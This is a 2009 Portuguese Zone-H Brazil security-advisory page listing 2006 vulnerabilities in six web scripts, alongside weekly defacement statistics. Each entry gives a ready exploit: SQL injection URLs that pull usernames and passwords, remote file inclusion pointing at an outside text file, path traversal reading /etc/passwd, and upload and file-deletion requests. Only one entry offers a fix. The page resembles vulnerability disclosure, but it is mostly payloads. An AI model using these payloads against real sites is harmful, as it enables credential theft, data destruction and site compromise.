Zone-H
Home arrow Avisos de Segurança
05 de julho de 2009
  
 
Ataques desta semana
O.S.  Defs.  %
Win 2003  4243  46.12%
Linux  3965  43.10%
Win 2000  486  5.28%
FreeBSD  208  2.26%
Win 2008  112  1.22%
Other  185  2.01%

Total de ataques: 9199 dos quais 3045 único(s) no ip e 6154 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Avisos de Segurança
FunkyASP Glossary: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
15 de novembro de 2006

Nome do Script: FunkyASP Glossary
Site do script: http://www.funkyasp.co.uk/
Versão Afetada: 1.0

Encontrado por Laurent Gaffié
Email: saps.audit [at] gmail.com

Exploração:

http://site.com/glossary/glossary.asp?alpha='[sql]
 
Aigaion: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
14 de novembro de 2006
Nome do Script: Aigaion
Site do script: www.aigaion.nl
Versão Afetada: 1.2.1

Encontrado por navairum
Email: navairum [at] gmail.com

Exploração:

http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/[PATH]/pageactionauthor.php?DIR=http://site/uhoh.txt?
 
Property Pro: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
13 de novembro de 2006
Nome do Script: Property Pro
Site do script: www.property-pro.co.uk
Versão Afetada: 1.0

Encontrado por ajann
Email: ajannhwt [at] hotmail.com

Exploração:

http://[target]/[path]/admin/

Usuário: ' union select 0,0 from admin
 
ContentNow: Múltiplas Falhas Remotas Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
13 de novembro de 2006
Nome do Script: ContentNow
Site do script: http://www.contentnow.mf4k.de/
Versão Afetada: 1.30
Encontrado por r0ut3r
Email: writ3r [at] gmail.com

Exploração(Inclusão de Arquivo Local):

http://localhost/cn/edit.php?lang=../../../../etc/passwd%00
http://localhost/cn/image.php?lang=../../../../etc/passwd%00
http://localhost/cn/upload.php?lang=../../../../etc/passwd%00

Exploração(Upload de arquivo):

http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en

Obs.:Você precisa ter permissão de escrita no diretório a ser escolhido como destino

Exploração(remoção de arquivo):
http://localhost/contentnow_130/cn/upload.php?path=[Diretorio]&cid=&type=file&folder=&lang=en&delfile=[Arquivo]&single=false

Como Consertar:

Restrição de acesso ao diretório CN com uso do .htaccess
 
Munch Pro: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
12 de novembro de 2006
Nome do Script: Munch Pro
Site do script: http://isystems.7host.com/isystems/
Versão Afetada: 1.0

Encontrado por ajann
Email: ajannhwt [at] hotmail.com

Exploração:

http://www.target.com/[path]/switch.asp?pg=subMenu&catid=-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%2
 
ASPPortal: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
12 de novembro de 2006
Nome do Script: ASPPortal
Site do script: http://www.aspportal.net
Versão Afetada: 4.0.0 e anteriores

Encontrado por ajann
Email: ajannhwt [at] hotmail.com

Exploração:

http://www.target.com/default1.asp?Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20
 
Mais...
<< Início < Anterior 1 2 3 4 5 6 7 8 9 10 Próximo > Fim >>

Resultados 131 - 156 de 236
[Voltar]
 
Top!
(C) 2009 Zone-H - Unrestricted Information
Top!